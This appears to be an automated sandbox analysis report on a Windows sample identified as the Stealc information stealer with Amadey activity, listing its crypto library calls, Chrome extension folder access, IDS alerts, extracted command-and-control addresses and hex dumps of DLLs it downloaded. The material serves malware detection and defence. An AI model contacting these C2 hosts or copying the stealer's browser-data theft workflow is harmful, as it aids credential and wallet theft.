Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6CBB7C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6CBBBD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB77D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6CB77D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6CBB9EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB93FF0 PK11_PrivDecryptPKCS1,	0_2_6CB93FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB93850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6CB93850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB99840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	0_2_6CB99840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBDA40 SEC_PKCS7ContentIsEncrypted,	0_2_6CBBDA40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB93560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6CB93560

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49734 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.8:49741 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2008434373.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2008434373.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 39MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.8:49706
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.8:49706
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49744 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49745

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:06:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:06:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:06:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:06:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:06:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
